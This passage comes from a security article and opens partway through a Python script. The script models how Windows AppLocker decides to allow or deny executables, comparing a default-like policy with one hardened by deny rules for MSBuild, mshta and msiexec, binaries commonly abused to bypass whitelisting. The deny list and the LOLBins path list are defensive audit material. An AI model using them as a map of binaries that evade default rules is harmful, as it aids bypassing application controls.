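<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000003" Name="Administrators all" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*"/></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"""

# Policy 2: the same allow rules plus explicit deny rules for the three binaries.
DENY_RULES = r"""
    <FilePathRule Id="00000000-0000-0000-0000-000000000010" Name="Block MSBuild" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Microsoft.NET\*\MSBuild.exe"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000011" Name="Block mshta" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\*\mshta.exe"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000012" Name="Block msiexec" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\*\msiexec.exe"/></Conditions>
    </FilePathRule>
"""
# Splice the deny rules into the collection (string surgery is fine for a constructed policy).
HARDENED_POLICY = DEFAULT_LIKE_POLICY.replace("  </RuleCollection>", DENY_RULES + "  </RuleCollection>")

LOLBINS = [
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
    r"C:\Windows\System32\mshta.exe",
    r"C:\Windows\SysWOW64\mshta.exe",
    r"C:\Windows\System32\msiexec.exe",
    r"C:\Users\aaru\Downloads\cmd.exe",   # a dropped copy, for contrast
]


def path_to_regex(rule_path: str):
    """Expand AppLocker path variables and turn '*' into a match-anything wildcard."""
    for var, real in PATH_VARS.items():
        rule_path = rule_path.replace(var, real)
    # '*' spans path separators too (modelled AppLocker behaviour); matching is case-insensitive.
    return re.compile("^" + ".*".join(re.escape(p) for p in rule_path.split("*")) + "$", re.IGNORECASE)


def load_exe_rules(policy_xml: str) -> List[Tuple[str, str, "re.Pattern"]]:
    """Return (Action, UserOrGroupSid, compiled path) for every FilePathRule in the Exe collection."""
    rules = []
    for coll in ET.fromstring(policy_xml.strip()).findall("RuleCollection"):
        if coll.get("Type") != "Exe":
            continue
        for rule in coll.findall("FilePathRule"):
            cond = rule.find("Conditions/FilePathCondition")
            rules.append((rule.get("Action"), rule.get("UserOrGroupSid"), path_to_regex(cond.get("Path"))))
    return rules


def decide(rules, exe_path: str, user_sids: Set[str]) -> str:
    """Modelled AppLocker decision: explicit deny wins, then any allow, else implicit deny."""
    applicable = [(action, rx) for action, sid, rx in rules if sid in user_sids]
    if any(action == "Deny" and rx.match(exe_path) for action, rx in applicable):
        return "deny"
    if any(action == "Allow" and rx.match(exe_path) for action, rx in applicable):
        return "allow"
    return "deny"


def audit(policy_xml: str, user_sids: Set[str], paths=LOLBINS) -> Dict[str, str]:
    rules = load_exe_rules(policy_xml)
    return {p: decide(rules, p, user_sids) for p in paths}


if __name__ == "__main__":
    for label, policy in (("default-like", DEFAULT_LIKE_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"== {label} policy, standard user ==")
        for path, verdict in audit(policy, {EVERYONE}).items():
            print(f"  {verdict:5}  {path}")
```

Denying msiexec.exe for Everyone also stops ordinary software installs, so in practice that rule is usually scoped to a non-administrative group SID rather than Everyone; the model shows why the default "Windows folder" allow rule alone is not enough.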

References:

https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here